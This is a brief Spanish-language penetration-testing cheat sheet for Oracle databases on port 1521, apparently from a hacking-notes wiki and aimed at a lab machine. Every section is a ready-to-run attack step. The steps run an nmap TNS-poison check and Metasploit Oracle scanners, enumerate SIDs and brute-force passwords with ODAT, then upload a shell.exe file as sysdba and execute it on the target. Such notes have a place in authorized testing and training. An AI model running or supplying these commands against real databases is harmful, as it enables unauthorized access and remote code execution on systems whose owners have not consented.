1521 - OracleDB
Nmap
nmap -p 1521 --script=oracle-vuln-tns-poison IP
Probar
METASPLOIT
use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/tnspoison_checker
use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/sid_brute
Enumerar SID
./odat.py sidguesser -s 10.10.10.82
Fuerza bruta
Cuidadin con los diccionarios por defecto que viene todo en mayuscula y Oracle distingue entre mayusculas y minusculas
./odat.py passwordguesser -s 10.10.10.82 -d XE
./odat.py passwordguesser -s 10.10.10.82 -d XE --acounts-file accounts/accounts.txt
Subir una shell
./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ shell.exe shell.exe
Ejecutar un fichero
./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ shell.exe
Referencias
Last updated
Was this helpful?